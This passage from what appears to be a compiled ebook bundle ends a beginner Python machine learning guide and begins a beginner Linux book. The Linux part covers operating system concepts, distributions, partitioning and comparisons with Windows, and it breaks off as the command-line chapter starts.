solution in case you deal with massive amounts of data. In this case, you will
need to interpret and make decisions from such data, hence you need a model
that is suitable given your resource allocation.
Deep learning models are also recommended when dealing with problems
that are too complicated to solve using machine learning algorithms. Beyond
this, it is important to realize that deep learning models usually have a very
high resource demand. Therefore, you should consider deep learning models
when you have the necessary financial muscle and resource allocation to
obtain the relevant programs and hardware.
Machine learning is a feasible solution when working with structured data
that can be used to train different machine learning algorithms. There is a lot
of learning involved before the algorithms can perform the tasks requested.
You can also use machine learning to enjoy the benefits of artificial
intelligence without necessarily implementing a full-scale artificial
intelligence model.
Machine learning algorithms are often used to help or speed up automation
processes in businesses and industrial processes. Some common examples of
machine learning models in use include advertising, identity verifiers,
information processing, and marketing. These should help your business
position itself better in the market against the competition.
Conclusion
Now that we have come to the end of the book, I hope you have gathered a
basic understanding of what machine learning is and how you can build a
machine learning model in Python. One of the best ways to begin building a
machine learning model is to practice the code in the book, and also try to
write similar code to solve other problems. It is important to remember that
the more you practice, the better you will get. The best way to go about this is
to begin working on simple problem statements and solve them using the
different algorithms. You can also try to solve these problems by identifying
newer ways to solve them. Once you get the hang of the basic problems,
you can try using some advanced methods to solve those problems.
Thanks for reading to the end!
Python Machine Learning may be the answer that you are looking for when it
comes to all of these needs and more. It is a simple process that can teach
your machine how to learn on its own, similar to what the human mind can
do, but much faster and more efficient. It has been a game-changer in many
industries, and this guidebook tried to show you the exact steps that you can
take to make this happen.
There is just so much that a programmer can do when it comes to using
Machine Learning in their coding, and when you add it together with the
Python coding language, you can take it even further, even as a beginner.
The next step is to start putting some of the knowledge that we discussed in
this guidebook to good use. There are a lot of great things that you can do
when it comes to Machine Learning, and when we can combine it with the
Python language, there is nothing that we can’t do when it comes to training
our machine or our computer.
This guidebook took some time to explore a lot of the different things that
you can do when it comes to Python Machine Learning. We looked at what
Machine Learning is all about, how to work with it, and even a crash course
on using the Python language for the first time. Once that was done, we
moved right into combining the two of these to work with a variety of Python
libraries to get the work done.
You should always work towards exploring different functions and features
in Python, and also try to learn more about the different libraries like SciPy,
NumPy, PyRobotics, and Graphical User Interface packages that you will be
using to build different models.
Python is a high-level language which is both interpreter based and object-
oriented. This makes it easy for anybody to understand how the language
works. You can also extend the programs that you build in Python onto other
platforms. Most of the inbuilt libraries in Python offer a variety of functions
that make it easier to work with large data sets.
You will by now have gathered that machine learning, while a complex concept, can be understood quite easily. It is not a black box of undecipherable terms, incomprehensible graphs, or impenetrable ideas. Machine learning is easy to
understand, and I hope the book has helped you understand the basics of
machine learning. You can now begin working on programming and building
models in Python. Ensure that you diligently practice since that is the only
way you can improve your skills as a programmer.
If you have ever wanted to learn how to work with the Python coding
language, or you want to see what Machine Learning can do for you, then
this guidebook is the ultimate tool that you need! Take a chance to read
through it and see just how powerful Python Machine Learning can be for
you.
LINUX FOR BEGINNERS:
THE PRACTICAL GUIDE TO
LEARN LINUX OPERATING
SYSTEM WITH THE
PROGRAMMING TOOLS FOR
THE INSTALLATION,
CONFIGURATION AND
COMMAND LINE + TIPS ABOUT
HACKING AND SECURITY.
JOHN S. CODE
Table of Contents
Introduction
Chapter 1 Basic Operating System Concepts, Purpose and
Function
Chapter 2 Basics of Linux
Chapter 3 What are Linux Distributions?
Chapter 4 Setting up a Linux System
Chapter 5 Comparison between Linux and other Operating
Systems
Chapter 6 Linux Command Lines
Chapter 7 Introduction to Linux Shell
Chapter 8 Basic Linux Shell Commands
Chapter 9 Variables
Chapter 10 User and Group Management
Chapter 11 Learning Linux Security Techniques
Chapter 12 Some Basic Hacking with Linux
Chapter 13 Types of Hackers
Conclusion
Introduction
If you have picked up this book, you are inevitably interested in Linux, at
least to some degree. You may be interested in understanding the software, or
debating whether it is right for you. However, especially as a beginner, it is
easy to feel lost in a sea of information. How do you know what version of
Linux to download? Or how to even go about downloading it? Is Linux even right for you in the first place? All of those are valid questions,
and luckily for you, Linux for Beginners is here to guide you through all of it.
Linux is an operating system, much like iOS and Windows. It can be used on
laptops, large computer centers, on cell phones, and even smart fridges. If it
can be programmed, Linux can almost definitely be installed, thanks to
several features and benefits. Linux is small, secure, supported on other
devices, and incredibly easy to customize. With Linux, you can create a setup
that is exactly what you want, with privacy, security, and access to plenty of
free-to-use software. This means that, once you develop the know-how, you can create a customized experience that does exactly what you need, allowing you to optimize your setup and ensure that it works the way you want.
As you read through this book, you will be given a comprehensive guide to
everything you need to know as a beginner to Linux. You will learn about
why and how to determine which distribution of Linux is right for you. You
will discover how to use the terminal, how to set up exactly what you will
need on your system, and more.
When you are able to make your customized setup however you see fit, this
means that you can make sure that you are always working within the
constraints of the hardware that you are using. This means that older
machines, which may struggle under the load of modern operating
systems such as Windows 10, can be optimized and used to their fullest
potential without wasting valuable resources or processing power on features
that are unnecessary, redundant, or even detrimental to whatever it is that
you need to do.
Ultimately, you will be provided with exactly what you need to know to get
started with Linux, from start to finish. You will even be provided with
several alternatives to Windows-specific applications that can be downloaded
and used while running Linux on your device. Everything will be provided in
the simplest terms possible, so you get a complete and thorough
understanding of exactly what you need to know if you wish to get started
with Linux. Between receiving several step-by-step guides, questions, and
lists of commands, you should have much of what you need to know to at
least get started with the installation of your own distribution of Linux!
Enjoy the journey!
Chapter 1 Basic Operating System Concepts,
Purpose and Function
Purpose of the Operating System
An operating system serves two purposes: first, it makes the computing
system convenient to use, and second, it ensures the efficiency and reliability
of its operation. The first function characterizes the OS as an extended
machine, the second characterizes it as a distributor of hardware resources.
Operating System as an Extended Machine
Using the operating system, the application programmer (and, through their
programs, the user) should have the impression of working with an extended,
more capable machine. The hardware is not well adapted for direct use in
applications. For example, if you consider working with I/O devices at the
command level of the respective controllers, you will see that the set of such
commands is limited and, for many devices, primitive. The operating system
hides this hardware interface and instead offers the programmer an
application programming interface that uses higher-level concepts (called
abstractions).
For example, when working with a disk, the typical abstraction is a file. It is
easier to work with files than directly with a disk controller (there is no need
to consider moving the drive heads, starting and stopping the motor, etc.), so
the programmer can focus on the essence of the application. The operating
system takes responsibility for interacting with the disk controller.
Isolating abstractions makes it easier for OS and application code to survive
a move to new hardware. For example, if you install a new type of
disk device on your computer (provided that it is supported by the OS), all of
its peculiarities are handled at the OS level, and applications will
continue to use files as before. This characteristic of the system is
called hardware independence: the OS provides a hardware-independent
environment for executing applications.
Operating System as a Resource Allocator
The operating system must allocate resources efficiently. It acts as the
manager of these resources and provides them to applications on demand.
There are two main types of resource allocation. With spatial sharing, several
consumers access a resource simultaneously, each using a part of it (this is
how memory is shared). With temporal sharing, the system keeps a queue of
consumers and, according to it, lets each one use the entire resource for a
limited time (this is how the processor is shared in single-processor systems).
When allocating resources, the OS resolves possible conflicts, prevents
programs from accessing resources to which they have no rights, and ensures
the efficient operation of the computer system.
Classification of Modern Operating Systems
Consider the classification of modern operating systems according to their
scope. First, note the OS of large computers (mainframes). The main
characteristic of the hardware they are designed for is I/O performance:
mainframes drive a large number of peripheral devices (disks, printers,
terminals, etc.). Such computer systems are used for the reliable processing
of large amounts of data, and the OS must support this process effectively
(in batch mode or with time sharing). An example of an OS of this class is
IBM's OS/390.
The following category includes server operating systems. The main feature
of such operating systems is the ability to serve a large number of user
requests for shared resources. Network support plays an important role for
them. There are specialized server OSes that exclude elements unrelated to
their basic functions (for example, support for desktop user applications),
but universal systems (UNIX or Windows XP systems) are now more
commonly used to implement servers.
The most widespread category is the personal OS. Some operating systems in
this category, developed by Microsoft with the average user in mind
(Windows 95/98/Me), are simplified versions of a universal OS. Personal
OSes pay particular attention to supporting the graphical user interface and
multimedia technologies.
There are also real-time OSes. In such a system, each operation must be
guaranteed to complete within a specified time range. A real-time OS may
control the flight of a spacecraft, an industrial process, or video playback.
Examples of specialized real-time OSes are QNX and VxWorks.
Another category is the embedded OS. These include control software for
various microprocessor systems used in military technology, consumer
electronics, smart cards, and other devices. Such systems have special
requirements: fitting into a small amount of memory and supporting
specialized devices. Embedded OSes are often developed for a specific
device; universal examples include embedded Linux and Windows CE.
Functional Components of Operating Systems
An operating system can be considered as a set of components, each of which
is responsible for the implementation of a specific function of the
system. Consider the most important features of the modern OS and the
components that implement them.
The way the system is built from components and their relationship is
determined by the architecture of the operating system. Each operating
system is going to be a bit different in the kind of work that it can handle, and
its organizational structure, so learning this and how to put it all together can
be important.
Process and Thread Management
One of the most important functions of the OS is executing applications.
Application code and data are stored on disk in a special executable file
format. When the user or the OS decides to run such a file, the system
creates the basic unit of execution, called a process. Put briefly, a process
is a program in the course of its execution.
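To make the idea concrete, the following minimal sketch shows that even an interactive shell is itself a process with its own process ID (the commands are standard on any Linux system):

```shell
# Every running program is a process with a unique process ID (PID).
# $$ expands to the PID of the shell process that runs this script.
echo "This shell runs as process $$"
# Starting another program creates a new process with a different PID:
bash -c 'echo "The child shell runs as process $$"'
```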
The operating system allocates resources between processes. These resources
include CPU time, memory, devices, and disk space in the form of files.
Memory is allocated to each process through its address space: the set of
memory addresses that the process is allowed to access. The process's code
and data are stored in its address space. Disk space is allocated similarly: for
each process, a list of its open files is maintained.
The resources a process owns are protected from other processes. For
example, a process's address space cannot be accessed directly by other
processes (it is protected), and when working with files, a mode can be
specified that denies access to the file to all processes except the current one.
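As a small illustration of this kind of protection, standard Linux file permissions can restrict a file to its owner alone (the file name below is just an example):

```shell
# Create a file and allow only its owner to read and write it (mode 600).
touch secret.txt
chmod 600 secret.txt
stat -c '%a %U' secret.txt   # prints the octal mode and the owner's name
rm secret.txt                # clean up
```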
The allocation of processor time between processes is necessary because the
processor executes instructions one at a time (i.e., at any particular moment,
only one process can physically execute on it), while to the user the processes
should appear as sequences of instructions executing in parallel. To achieve
this effect, the OS gives the processor to each process for a short time, then
switches the processor to another process; the execution of each process
resumes from the place where it was interrupted. In a multiprocessor system,
processes can run truly in parallel on different processors.
In addition to processes, modern operating systems support multithreading:
the presence within a process of several sequences of instructions (threads)
that, for the user, appear to run in parallel, much like the processes
themselves. Unlike processes, threads do not provide resource protection (for
example, they share the address space of their parent process).
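The effect of several activities appearing to run in parallel can be sketched from the shell, where `&` asks the OS to run each command as a separate background process:

```shell
# Launch two independent processes; the OS scheduler interleaves them.
( echo "task A finished" ) &
( echo "task B finished" ) &
wait                      # block until both background processes exit
echo "both tasks are done"
```

The order of the first two lines of output is up to the scheduler, which is exactly the point.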
Memory Management
While executing code, the processor takes instructions and data from the
computer's main memory. Main memory is presented as an array of bytes,
each of which has an address.
Main memory is a resource shared between processes, and the OS is
responsible for allocating it. A process's address space is protected while the
process runs and is released only after the process completes. The amount of
memory available to a process can vary during execution as memory is
redistributed.
The OS must be able to run programs whose size, individually or in
aggregate, exceeds the available main memory. To this end, virtual memory
technology is used. It allows keeping in main memory only those instructions
and data of a process that are needed at the current time, while the contents
of the rest of the address space are stored on disk.
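On a running Linux system you can see the split between physical memory and the disk-backed swap space that virtual memory relies on; this sketch assumes the standard `/proc` interface is mounted, as it is on virtually every Linux installation:

```shell
# /proc/meminfo is the kernel's report on memory.
# MemTotal is physical RAM; SwapTotal is disk space usable as backing store.
grep -E '^(MemTotal|SwapTotal)' /proc/meminfo
```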
I/O Management
The operating system is responsible for managing the I/O devices connected
to the computer. Support for such devices in the OS is usually organized at
two levels. The first, lower level comprises device drivers: software modules
that control devices of a particular type, taking all their features into
account. The second level is a versatile I/O interface convenient for use in
applications.
The OS implements a common driver interface through which drivers
interact with the other components of the system. This interface makes it
easy to add drivers for new devices. Modern OSes ship with a large selection
of ready-made drivers for specific peripherals; the more devices an OS
supports, the better its chances of practical use.
File Management and File Systems
For OS users and programmers, disk space is presented as a set
of files organized into a file system. A file is a named collection of data that
can be accessed by that name. The term "file system" is used for two
concepts: the principle of organizing data in the form of files, and a specific
set of data (usually the corresponding part of a disk) organized in
accordance with this principle. An OS can support several file systems
simultaneously.
File systems are considered at the logical and physical levels. The logical
level defines the external representation of the system as a collection of files
(usually located in directories), as well as performing operations on files and
directories (creation, deletion, etc.). The physical layer defines the principles
of allocation of data structures of the file system on the drive.
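At the logical level described above, everyday work reduces to a handful of operations on files and directories; here is a minimal sketch (the names are arbitrary):

```shell
# Create a directory, create a file in it by name, read it back, delete it.
mkdir -p demo_dir
echo "hello from the file system" > demo_dir/note.txt
cat demo_dir/note.txt        # prints: hello from the file system
ls demo_dir                  # prints: note.txt
rm -r demo_dir               # remove the directory and its contents
```

The physical placement of these bytes on disk is entirely the OS's business; the names are all you deal with.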
Network Support
Network systems
Modern operating systems are adapted to work on a network; they are
called network operating systems. Networking support enables the OS:
❖ To make local resources (disk space, printers, etc.) available over the
network, i.e., to function as a server
❖ To access the resources of other computers over the network, i.e., to
function as a client
The server and client functionality is implemented on top of transport
facilities responsible for transmitting data between computers according to
the rules of specified network protocols.
Distributed systems
Network OSes do not hide the presence of the network from the user; the
network support in them does not determine the structure of the system but
enriches it with additional capabilities. There are also distributed OSes,
which pool the resources of several computers into a distributed system.
Such a system appears to the user as a single computer with multiple
processors working in parallel. Distributed and multiprocessor systems are
the two major categories of OS that use multiple processors.
Data Security
Data security in an OS means ensuring the reliability of the system
(protecting data against loss in case of failure) and protecting data against
unauthorized access (accidental or intentional). To protect against
unauthorized access, the OS provides authentication of users (means of
determining whether users really are who they claim to be, usually via
passwords) and their authorization (verifying that a user who has been
authenticated has the rights to perform a specific operation).
User Interface
There are two kinds of means for user interaction with a running system: the
command interpreter (shell) and the graphical user interface (GUI). The
command interpreter enables users to interact with the OS using a special
command language, either interactively or by executing batch files (scripts).
Commands of this language cause the OS to perform certain actions (for
example, run applications or work with files).
The graphical user interface lets the user interact with the OS by opening
windows and executing commands with menus or buttons. There are many
approaches to implementing a GUI: in Windows systems, for example, GUI
support is built into the system, while in UNIX it is external to the system
and relies on standard I/O facilities.
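A command-language "batch file" for the shell can be as small as this sketch; save it as, say, `hello.sh` (the name is just an example) and run it with `bash hello.sh`:

```shell
#!/bin/bash
# A tiny shell script: a variable, command substitution, and output.
user_name="Linux user"
today=$(date +%A)                 # the current day of the week
echo "Hello, $user_name - happy $today!"
```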
Conclusions
❖ An operating system is a layer of software that lies between the
application layer and the computer hardware. Its main purpose is to make
computer systems easier to use and to improve the efficiency of their
operation.
❖ The main functional components of an OS are process management,
memory management, I/O management, file management and file system
support, network support, data protection, and the user interface.
Chapter 2 Basics of Linux
Linux provides a complete operating system, from the lowest level of
hardware control to full resource management. Its architecture follows the
good traditions of UNIX, refined over decades, and is very stable and
powerful. Moreover, since this excellent architecture runs on the ordinary
PC (the x86 family), many software developers have gradually moved their
efforts to it, so the Linux operating system also has a wealth of applications.
Strictly speaking, Linux is only the kernel and the tools it provides, but the
integration of the kernel and tools with the software supplied by application
developers makes Linux a complete and powerful operating system.
Why Linux Matters?
Now that we know what Linux is, let's talk about what Linux is currently
used for. Because the Linux kernel is small and efficient, it can run in many
environments that demand low power consumption and modest hardware
resources. Because Linux distributions integrate a lot of great software
(whether proprietary or free), Linux is also quite suitable for today's
personal computers. Traditionally, the most common applications of Linux
are roughly divided into enterprise and personal applications, and the
popularity of cloud computing in recent years has made Linux even more
prominent. The sections below describe a few real-life applications of Linux.
Utilization in the Enterprise Environment
The goal of enterprise digitalization is to provide consumers or employees
with information about products (such as web pages) and to keep data
consistent across the enterprise (such as unified account management and
file management systems). In addition, businesses that emphasize mission-
critical applications, such as the financial industry with its databases and
security requirements, have adopted Linux in their environments.
Web Server:
This is currently the most popular application of Linux. Having inherited
UNIX's tradition of high stability, Linux is particularly stable and powerful
when used for network functions. In addition, thanks to the GNU project
and the GPL licensing model, much excellent software has been developed
on Linux, and the server software for Linux is almost all free software.
Therefore, for services such as web (WWW), mail, and file transfer servers,
Linux is an excellent choice. This is a major strength of Linux and the main
reason for its popularity among programmers and network engineers. The
demand for Linux servers is strong enough that many hardware vendors
specify the supported Linux distributions when launching their products.
Mission-critical applications (financial databases, large enterprise
network management environments)
Thanks to the high performance and low price of personal computers,
financial and large-enterprise environments have gradually moved to Intel-
compatible x86 host environments. In addition, the software these
enterprises use mostly runs on UNIX operating system platforms, which
makes Linux a natural fit.
High performance computing tasks for academic institutions:
Academic institutions often need to develop their own software, so there is
an urgent demand for an operating system that can serve as a development
environment. A university of science and technology with many engineering
departments needs this kind of environment for student projects: examples
include fluid mechanics in engineering, special effects in entertainment,
working platforms for software developers, and more. Linux offers strong
computing performance (its creator cared deeply about performance), and it
is supported by the widely ported GCC compilers, so its advantages in this
area are obvious.
Why is Linux better than Windows for hackers?
1. Open source
Open source means software whose source code is open to the public. It can
be modified if you have the skills, and you can redistribute it with your own
features. Open-source software and operating systems help people excel in
their skillset. Being open source, Linux is free to install, unlike Windows,
which charges money for licenses.
2. Freedom
Hackers need freedom, and Linux is free in every sense. The source of the
programs is open, and you can freely look around inside. It is easy to break
things along the way, but that is part of the fun. Freedom is great: you can
make adjustments as you like and customize the system to your own or your
company's requirements, and it stays flexible every time. Windows, by
contrast, restricts its users in many areas.
3. Used in servers
Linux is not only free but also lightweight and works well as a server OS.
Red Hat, the famous server software, is a Linux distribution. Many hosting
companies and websites run their servers on Linux, and for a hacker who
works with the client-server model to probe targets, Linux is very
convenient and flexible.
4. Many types
The best thing about Linux is the number of choices you have in the
form of distributions. Hackers can use distributions like Kali and Parrot,
which come preinstalled with hacking tools, whereas on Windows you
would face the tedious work of installing every tool by hand.
5. Light
The Linux operating system is very lightweight and suffers far fewer lags
and forced shutdowns than Windows. As a hacker, you do a lot of work
across different terminals, so a fast, light environment like Linux is
important for smooth performance.
6. Stable Operation
Linux also works very stably. Its network functions and security are well
thought out, so you can rely on it and use it with peace of mind. In fact,
many corporate sites and web services run on Linux. Given all this, you can
see that it is a reliable OS.
Chapter 3 What are Linux Distributions?
When you get Linux for your computer, you are essentially getting a Linux
distribution. Just like other popular operating systems, you get an installation
program that consists of the kernel, a graphical user interface, a desktop, and
a bunch of applications that you can readily use once you have installed
Linux on your computer. The added bonus is that you also get your hands on
the source code for the kernel and the applications, which allows you to
tweak them to operate the way you want in the future.
While you can add desktop environments, apps, and drivers that don’t come
with your distribution, you will need to find the distribution that will give you
the ideal setup that you have in mind. Doing so will save you the time that
you may need to spend on finding apps and other programs that will work
best with the Linux that you have installed, which can get in the way of
setting up the system just the way you want it.
What Comes with a Distro?
1. GNU software
Most of the tasks that you will be performing using Linux involve GNU
software. These are utilities that you can access using the text terminal, or the
interface that looks like a Windows command prompt where you enter
commands. Some of the GNU software that you will be using are the
command interpreter (also known as the bash shell) and the GNOME GUI.
If you are a developer, you will be able to make changes to the kernel or
create your own software for Linux using the GNU C and C++ compilers
(these already come with the GNU software in your Linux distro). You will
also be using GNU software if you edit code or text files with the emacs or
ed editors.
Some of the most popular GNU software packages that you will encounter
as you explore Linux utilities include the bash shell, the coreutils file and
text utilities, the gcc compiler collection, and the emacs editor.
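To get a quick taste, here are a couple of these GNU utilities in action (all of the commands below ship with virtually every distro):

```shell
# echo, tr, and wc are all part of the standard GNU toolset.
echo "gnu tools at work" | tr 'a-z' 'A-Z'   # prints: GNU TOOLS AT WORK
echo "gnu tools at work" | wc -w            # prints: 4
```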
3. Networks
Linux allows you to find everything you need over a network and exchange
information with other computers. It does this through its support for
TCP/IP (Transmission Control Protocol/Internet Protocol), which allows
you to surf the web and communicate with any server or computer out
there.
4. Internet servers
Linux supports Internet services, such as the following:
Email
News services
File transfer utilities
World Wide Web
Remote login
Any Linux distro can offer these services, as long as there is an Internet
connection and the computer is configured with Internet servers: special
server software that allows a Linux computer to provide information to
other computers. Common examples include the Apache web server, mail
servers such as sendmail and Postfix, FTP servers such as vsftpd, and the
OpenSSH server for remote login.
5. Software Development
Linux is a developer’s operating system: it is an environment fit for
developing software. Right out of the box, the operating system is rich with
software development tools, such as compilers and libraries of code for
building programs. If you have a background in C and Unix, Linux should
feel like home to you. Linux offers the basic tools you may have used on
Unix workstations from vendors such as Sun Microsystems, HP (Hewlett-
Packard), and IBM.
6. Online documentation
After some time, you will want to look up more information about Linux
without having to pull up this book. Fortunately, Linux has enough
documentation available online to help you in situations such as recalling
the syntax of a command. To pull this information up quickly, all you need
to do is type "man" followed by a command name at the command line to
get the manual page for that command. You can also get help from your
desktop by using either the help option or its icon.
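For example, to read the manual for `ls` you would run `man ls` (it opens in a pager; press q to quit). Many commands also print a quick summary with `--help`, as this sketch shows:

```shell
# The full manual page (interactive, so shown here as a comment):
#   man ls
# A quick non-interactive summary of a command's options:
ls --help | head -n 2
```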
Things to Consider When Choosing Distros
What is the best Linux distro (short for distribution) for you? Here are
some things that you may want to keep in mind:
Package managers
One of the major factors that separate distros from one another is the
package manager they come with. As you might expect, some distros come
with package managers that are easier to use from the command line when
you are installing and updating software.
Another thing to consider, apart from ease of use, is the package availability
that comes with a distro. Some distros are not as popular as others, which
means fewer apps are packaged for them. If you are starting out on Linux, it
may be a good idea to install a distro that not only promises easy navigation
from the get-go, but also a wide range of apps that you may want to install
in the future.
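To give a feel for the differences, these are the typical install commands for the major distro families (they need root privileges and a network connection, so they are shown as comments; the package name is just an example):

```shell
# Debian/Ubuntu (APT):   sudo apt update && sudo apt install vlc
# Fedora (DNF):          sudo dnf install vlc
# Arch (pacman):         sudo pacman -S vlc
# openSUSE (zypper):     sudo zypper install vlc
echo "Each distro family ships its own package manager."
```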
Desktop environment
You will want a distro whose desktop works well with your computing
needs – you will definitely want a desktop with great customization options
and easy-to-find windows and menus. You will also want to ensure that
your desktop makes efficient use of resources and integrates well with the
apps you plan to use.
While it is possible to add another desktop environment later, you will still
want the desktop that comes with your distro to resemble the one you really
want. This way, you will not have to spend too much effort setting up every
app you want quick access to and making sure that all your applications
work well together.
Hardware Compatibility
Different distros ship different drivers in their installation packages, which
means each has a recommended set of hardware on which it works
seamlessly. Of course, you can hunt down other drivers that work with your
existing hardware, but that only creates more work when it comes to getting
everything running right after installation. To avoid this trouble, check the
distro's hardware compatibility page and see whether all your computer's
peripherals work out of the box with your Linux distribution.
Community Support
Linux is all about the community that continuously provides support to this
operating system, from documentation to troubleshooting. This means that
you are likely to get the resources that you need when it comes to managing a
particular distribution if it has a large community.
1. Ubuntu
Ubuntu is largely designed to make Linux easy to use for an average
computer user, which makes it a good distribution for every beginner. This
distro is simple, updates every six months, and has a Unity interface, which
allows you to use features such as a dock, a store-like interface for the
package manager, and a dashboard that allows you to easily find anything on
the OS. Moreover, it also comes with a standard set of applications that
works well for most users, such as a torrent downloader, the Firefox web
browser, and an app for instant messaging. You can also expect great
support from its large community.
2. Linux Mint
This distro is based on Ubuntu but is designed to make things even easier for
any user that has not used Linux in the past – it features familiar menus and is
not limited to just open source programs. This means that you can get
features that are standard on popular operating systems, such as .mp3
support and Adobe Flash, as well as a number of proprietary drivers.
3. Debian
If you want to be cautious and you want to see to it that you are running a
bug-free and stable computer at all times, then this is probably the distro for
you. Its main thrust is to make Linux a completely reliable system, but this
can have some drawbacks – Debian does not prioritize getting the latest
versions of the applications you have, which means that you may have to
manually search for the latest release of much of the software you use. The
upside is that you can run Debian on numerous processor architectures, and it
is very likely to run on old builds.
However, this does not mean that going with Debian means remaining
outdated – it has a lot of programs available online and in the Linux
repositories.
4. OpenSUSE
OpenSUSE is a great distro to consider because it allows you to configure
your OS without needing to deal with the command line. It comes with
KDE as the default desktop, but also lets you select between LXDE, XFCE,
and GNOME as you install the distro package. It also provides good
documentation, the YaST configuration and package-management tool, and
great support from the community.
One of the drawbacks that you may have when using this distro is that it can
consume a lot of resources, which means that it is not ideal to use on older
processor models and netbooks.
5. Arch Linux
Arch Linux is the distro for those that want to build their operating system
from scratch. All that you get from the installation package at the start is the
command line, which you then use to install applications, a desktop
environment, drivers, and so on. This means your system can be as minimal
or as feature-heavy as your needs dictate.
If you want to be completely aware of what is inside your operating system,
then Arch Linux is probably the best distro for you to start with. You will be
forced to deal with any possible errors that you may get, which can be a great
way to learn about operating Linux.
Another thing that makes this distro special is that it uses Pacman, which is
known to be a powerful package manager. Pacman follows a rolling-release
model, which means you always install the latest version of every package –
this ensures cutting-edge applications and features for your Linux system.
Apart from this package manager, you also get to enjoy the AUR (Arch User
Repository), which lets the community publish installable versions of
programs. If a program is not available in the official Arch repositories, you
can use an AUR helper to install it like a normal package.
Chapter 4 Setting up a Linux System
As for the preparation of disk space, this is the most crucial moment in the
whole process of installing Linux. The fact is that if you install the system on
a computer whose hard disk already has any data, then it is here that you
should be careful not to accidentally lose it. If you install a Linux system on a
“clean” computer or at least on a new hard disk, where there is no data, then
everything is much simpler.
Why can’t you install Linux in the same partition where you already have, for
example, Windows, even with enough free space?
The fact is that Windows uses the FAT32 file system (in old versions,
FAT16) or NTFS (in Windows NT/2000), while Linux uses a completely
different system called the Extended File System 2 (ext2fs; in the newest
versions, the journaling ext3fs). These file systems must be located on
different partitions of the hard disk.
Note that in Linux, physical hard disks are referred to as hda for the first,
hdb for the second, hdc for the third, and so on (hdd, hde, hdf, ...).
Sometimes in the installation program you may see the full device names:
/dev/hda instead of hda, /dev/hdb instead of hdb, and so on – for our
purposes these are the same thing. The logical partitions of each disk are
numbered, so physical disk hda contains hda1, hda2, and so on, while hdb
contains hdb1, hdb2, and so on. Do not be confused if these numbers are
sometimes not consecutive; it does not matter here.
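You can see these device names on a live system: everything a program touches, including disks and partitions, appears as a file under `/dev` (the runnable line below only checks `/dev/null`, since the exact disk names vary from machine to machine):

```shell
# Disk devices live under /dev: /dev/hda, /dev/sda, /dev/sda1, and so on.
# /dev/null is present on every Linux system, so use it as a sanity check:
ls -l /dev/null
# To list the block devices on your own machine, you would typically run:
#   lsblk        (or: cat /proc/partitions)
```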
There are three main ways to connect a Linux machine to the Internet:
❖ a wireless network;
❖ a local network;
❖ a modem over which data is exchanged via PPP.
In the first case, a wireless access point is required; only if one is available
can you set up a wireless connection to the Internet.
The second method is used when your computer is connected to a local
network that has a server providing access to the World Wide Web. In this
case, you do not need to put any effort into organizing the connection – the
local network administrator will do everything necessary for you. Just
launch a browser, enter the URL you are interested in, and access it.
And the third way is a dial-up modem connection. In this case, the
administrator will not help you, so you have to do everything yourself. For
these reasons, we decided to consider this method in more detail.
First, naturally, you should have a modem and a telephone. Next, you need to
decide on the provider that provides access to the Internet and get from it the
phone number by which your PC will connect to the modem pool of the
provider and, of course, your username and password to access the global
network.
Next, you need to configure the PPP protocol. This can be done manually, or
you can use the configuration program. Manual configuration is quite
complicated and requires editing files and writing scripts. Therefore, it is
preferable for beginners to work with a special program that automates the
entire process of setting up access to the Internet.
This program is called kppp and is originally included in the KDE graphical
environment. This utility makes it much easier to set up a connection and, in
most cases, requires you to only correctly specify accounting information.
Chapter 5 Comparison between Linux and other
Operating Systems
Although the Linux operating system can easily co-exist with other operating systems on the same machine, it still differs from systems such as OS/2, Windows 95/98, Windows NT, and other implementations of UNIX for the personal computer. We can compare and contrast Linux with the other operating systems on the following points.
Linux is a Version of UNIX
Windows NT and OS/2 are multitasking operating systems, just like Linux. Technically, both are very similar to Linux in features such as networking, user interface, and security. The difference is that Linux is a version of UNIX, and as such it enjoys the benefits of the contributions of the UNIX community at large.
Full Use of the x86 Processor
Windows 95/98 cannot fully utilize the functionality of the x86 processor, but Linux runs entirely in this processor's protected mode and exploits all of its features, including support for multiple processors.
Linux OS is Free
Most other operating systems are commercial, and although Windows is relatively inexpensive, the cost of some operating systems is high for most personal computer users; some retail operating systems cost $1000 or more, compared to free Linux. Linux is free because anyone with access to the Internet, or to another computer on a network, can download and install it at no cost. Another option is to copy Linux from a friend's system that already has the software.
Runs a Complete UNIX System
Unlike with other operating systems, you can run an entire UNIX system with Linux at home without incurring the high cost of other UNIX implementations. In addition, some tools enable Linux to interact with Windows, so it becomes effortless to access Windows files from Linux.
Linux OS Still Does More than Windows NT
More advanced operating systems are always on the rise in the world of personal computers, such as Microsoft Windows NT, which is currently popular for server computing. But Windows NT cannot benefit from the contributions of the UNIX community the way Linux does. Windows NT is also a proprietary system: its interface and design are owned and controlled by one corporation, Microsoft, so only that corporation may implement the design, and there may not be a free version of it for a very long time.
Linux OS is More Stable
Linux and operating systems such as Windows NT are battling for a fair share of the server computing market. Windows NT has the full support of the Microsoft marketing machine, but Linux has the help of a community of thousands of developers who advance it through the open-source model. Each operating system has its weak and strong points, but Linux stands out because other operating systems, especially Windows NT, can crash easily and often, while Linux machines are more stable and can run continuously for extended periods.
Linux has Better Networking Performance than Others
Linux is notably better when it comes to networking performance. Although Linux is also smaller than Windows NT, it has a better price-performance ratio and competes favorably with other operating systems because of its effective open-source development process.
Linux Works Better with Other Implementations of UNIX
Unlike other operating systems, Linux works well with other implementations of UNIX. UNIX features and other UNIX implementations for the personal computer are similar to those of Linux. Under the open-source model there is strong demand for Linux to support almost every kind of graphics card, sound board, SCSI adapter, and so on, so Linux is made to support an extensive range of hardware.
Booting and File Naming
With Linux there is no limitation on booting: it can be booted from either a logical partition or a primary partition. Other operating systems, such as Windows, are restricted to booting from the primary partition. Linux file names are also case sensitive, while in others, such as Windows, they are case insensitive.
The Linux Operating System is Customizable
Unlike other operating systems, most notably Windows, Linux can be personalized: a user can modify the code to suit any need, and can even change the look and feel of the system.
Separating the Directories
In Linux, directories are separated using a forward slash, while in Windows the separation is done with a backslash. Linux also uses a monolithic kernel, which naturally takes more running space, unlike operating systems that use a microkernel, which consumes less space but is considerably less efficient than Linux.
Chapter 6 Linux Command Lines
At this juncture, you should have a fair understanding of basic commands,
and Linux should be installed in your system. You now have an incredible
opportunity ahead of you – a completely blank slate where you can begin to
design an operating system. With Linux, you can easily customize your
operating system so that it does exactly what you would like it to do. To
get started, you need to install a selection of reliable and functional
applications.
For ease of explanation, it is assumed that you are using Ubuntu. When you
are looking to install an application in Linux, the process is quite different
than what you would encounter in Windows. With Windows, you normally
need to download an installation package sourced at a website, and then you
can install the application.
With Linux, this process is not necessary as most of the applications are
stored in the distribution’s repositories. To find these applications, follow
these steps.
Go to System -> Administration -> Synaptic Package Manager
When you get to this point, you need to search for the package that you
